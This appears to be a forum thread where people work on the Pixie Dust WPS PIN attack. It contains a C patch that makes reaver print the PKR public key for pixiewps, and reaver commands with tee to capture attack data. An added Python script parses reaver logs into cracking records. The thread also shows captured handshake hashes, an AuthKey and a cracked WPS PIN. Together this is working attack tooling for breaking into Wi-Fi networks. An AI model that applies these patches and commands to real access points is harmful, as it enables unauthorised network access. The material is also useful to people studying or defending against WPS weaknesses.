E-Hash1: 6b:f2:06:6b:dd:ce:f7:4c:42:df:62:d8:60:3b:3b:2d:b9:da:8e:da:d6:f5:df:b4:a7:2f:a2:c6:bd:61:61:87
E-Hash2: d7:e2:ce:c5:2f:0d:b4:8e:f3:a6:19:ee:38:d7:19:55:1a:ef:3a:7f:ab:93:e5:0c:df:fe:cf:bb:f1:ab:06:74
Is this helpful?
Code:diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c --- a/src/crypto/dh_groups.c +++ b/src/crypto/dh_groups.c @@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_ wpabuf_put(pv, pv_len); wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv); + printf("[P] PKR: "); + int pixiecnt = 0; + const u8 *pkr = wpabuf_head_u8(pv); + for (; pixiecnt < 192; pixiecnt++) { + printf("%02x", pkr[pixiecnt]); + if (pixiecnt != 191) { + printf(":"); + } + } + printf("\n"); + return pv; }
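Review bot: the loop bound `for (; pixiecnt < 192; pixiecnt++)` hardcodes the public-value length instead of taking it from the buffer that `wpabuf_put(pv, pv_len)` just filled; for the WPS 1536-bit group that is 192 bytes, but any other `pv_len` would either read past the buffer or print a truncated key, so use `wpabuf_len(pv)` as the bound (and `pixiecnt + 1 != len` for the separator test) instead of `192` and `191`. The declarations `int pixiecnt` and `const u8 *pkr` sit after the first `printf`; moving them to the top of the block keeps the hunk consistent with the surrounding code style. Since `wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv)` on the line above already dumps the same bytes under debug logging, the added `printf` block only needs to exist for the `[P] PKR:` line that pixiewps consumes, which is worth a comment in the hunk.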
@someone_else Thanks for all the data! I've added it
I'll upload the new reaver tomorrow when I get a chance
New reaver and pixiewps, good times
For the modded reaver for pixiedust
You can separate out the pixiedust data and write directly to a file as follows:
If you include the -o <filename> command in the reaver command line:
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01
reaver will write all data not preceded by [P] to the file pixietest01
reaver will write data preceded by [P] to the screen, not to the file
The data preceded by [P], though, is the data required for a pixiedust attack.
Therefore:
To write only pixiedust data to a file use the following:
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01 | tee pixiedust02
In this case:
Non-pixiedust data will be written to pixietest01
Pixiedust data only will be written to both screen and the file pixiedust02
Musket Teams
Last edited by mmusket33; 2015-04-12 at 10:57.
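The two posts this serves are soxrok2212's requested record layout (Authkey, nonces, PKe, E-Hash1/2, manufacturer, model, pin) and the note just above about separating the `[P]` lines from the rest of reaver's output. Below is an added example, not reaver's, pixiewps' or Musket Teams' code, that parses a saved `reaver -vv` log into that record, normalizes hex that forum line-wrapping has damaged (stray spaces inside bytes, as in several posts in this thread), flags truncated or missing fields before the record goes into the shared sheet, and splits `[P]` lines from progress lines. All function names are mine; the sample log is constructed from values posted in this thread, with the damage added deliberately.

```python
import re
from typing import Dict, List, Optional

# Label printed by reaver -> (record key, expected length in bytes)
HEX_FIELDS = {
    "E-Nonce": ("e_nonce", 16),
    "PKE": ("pke", 192),      # DH group 1536 public value
    "PKR": ("pkr", 192),
    "AuthKey": ("authkey", 32),
    "E-Hash1": ("e_hash1", 32),
    "E-Hash2": ("e_hash2", 32),
}
TEXT_FIELDS = {
    "WPS Manufacturer": "manufacturer",
    "WPS Model Number": "model",
    "WPS PIN": "pin",
    "AP SSID": "ssid",
}
# "WPA PSK" is deliberately in neither table: the passphrase is not needed
# for the database, and the posts in this thread redact it.
REQUIRED_TEXT = ("manufacturer", "model", "pin")

# "[P] Label: value" or "[+] Label: value"; lines without a colon are skipped.
LINE_RE = re.compile(r"^\[[P+]\]\s+([A-Za-z0-9 -]+?):\s*(.*)$")

# Constructed sample log: values from posts in this thread, with the
# whitespace damage forum wrapping adds inside the hex, a truncated PKE
# ("....") and no PKR line at all.
SAMPLE = """\
[+] Waiting for beacon from 00:11:22:33:44:55
[P] E-Nonce: 0e:3e:ee:d8:97:3d:a4:f1:ed:8d:b6:3a:9c:3 1:b2:30
[P] PKE: f0:bc:40:a6:c4:8f:85:eb:e0:6b:47:96:f3:7f:7c:b d:34:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] AuthKey: 76:f9:c0:a7:4c:dc:7a:c5:2e:65:56:02:a6:df:0d:62:0d :9a:3f:a0:7a:d4:fb:94:af:72:4b:92:f1:26:3e:70
[+] Sending M2 message
[P] E-Hash1: 4d:0d:e2:7b:b0:0e:7b:4a:15:81:a6:0a:e1:4c:91:3d:73 :a2:c7:2e:30:45:69:89:0d:cb:0f:ab:97:d9:7f:f1
[P] E-Hash2: d7:df:23:9a:7d:20:74:80:fe:e6:1b:eb:00:19:49:43:35 :8e:05:72:0f:e0:dd:5c:45:a9:a4:a5:dc:e0:09:14
[+] Received M3 message
[+] Pin cracked in 11 seconds
[+] WPS PIN: '56276053'
[+] WPA PSK: 'REDACTED'
[+] AP SSID: 'HOME-XXXX'
"""


def split_pixie_lines(text: str):
    """Return ([P] lines, all other lines): the split the -o / tee trick aims for."""
    lines = text.splitlines()
    pixie = [ln for ln in lines if ln.startswith("[P] ")]
    other = [ln for ln in lines if not ln.startswith("[P] ")]
    return pixie, other


def normalize_hex(value: str) -> Optional[str]:
    """Drop colons and stray whitespace; return lowercase hex, or None when the
    value was truncated with dots or is not clean, byte-aligned hex."""
    if "..." in value:
        return None
    compact = re.sub(r"[\s:]", "", value)
    if not compact or len(compact) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", compact):
        return None
    return compact.lower()


def parse_reaver_output(text: str) -> Dict[str, Optional[str]]:
    """Build the record from a reaver -vv log; unknown labels are ignored."""
    record: Dict[str, Optional[str]] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # progress lines such as "[+] Received M1 message"
        label, value = m.group(1), m.group(2)
        if label in HEX_FIELDS:
            record[HEX_FIELDS[label][0]] = normalize_hex(value)
        elif label in TEXT_FIELDS:
            record[TEXT_FIELDS[label]] = value.strip().strip("'")
    return record


def check_record(record: Dict[str, Optional[str]]) -> List[str]:
    """List what is missing or unusable before the record goes into the sheet."""
    problems: List[str] = []
    for label, (key, nbytes) in HEX_FIELDS.items():
        if key not in record:
            problems.append(f"{label}: missing")
        elif record[key] is None:
            problems.append(f"{label}: truncated or malformed")
        elif len(record[key]) != 2 * nbytes:
            problems.append(f"{label}: expected {nbytes} bytes, got {len(record[key]) // 2}")
    for key in REQUIRED_TEXT:
        if not record.get(key):
            problems.append(f"{key}: missing")
    return problems


if __name__ == "__main__":
    rec = parse_reaver_output(SAMPLE)
    for key, val in rec.items():
        print(f"{key}: {val}")
    print("problems:", check_record(rec) or "none")
    print("[P] lines:", len(split_pixie_lines(SAMPLE)[0]))
```

On the sample, the record comes out with a clean 16-byte E-Nonce and 32-byte AuthKey and hashes despite the inserted spaces, while `check_record` reports the truncated PKE and the absent PKR, which is exactly the two things a submission most often lacks in this thread. Pointing `parse_reaver_output` at the file written by `tee` gives the same result for a real session.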
To soxrok2212
MTeams modded the /src/crypto/dh_groups.c file as suggested by Espresso above.
We reinstalled reaver and ran tests.
The --pkr variable is then provided through reaver along with --pke etc.
The mod is inserted below line 606
Line 606 = wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
wpabuf_put(pv, pv_len);
wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
/******** ADD THIS PART ******/
/* Print the registrar public key (PKR) in reaver's "[P]" style so it can be
 * handed to pixiewps. The buffer was just filled with pv_len bytes, so take
 * the length from the buffer itself (192 bytes for the WPS 1536-bit DH
 * group) rather than hardcoding it. */
{
	const u8 *pkr = wpabuf_head_u8(pv);
	size_t pkr_len = wpabuf_len(pv);
	size_t pixiecnt;
	printf("[P] PKR: ");
	for (pixiecnt = 0; pixiecnt < pkr_len; pixiecnt++) {
		printf("%02x", pkr[pixiecnt]);
		if (pixiecnt + 1 != pkr_len)
			printf(":");
	}
	printf("\n");
}
/*** END ADD THIS PART END ***/
return pv;
}
We will send you an automated script soon. We are currently using it, but the addition of a --pkr variable provided by reaver has caused us to have to add this choice into the menu so there will be a delay.
MTeams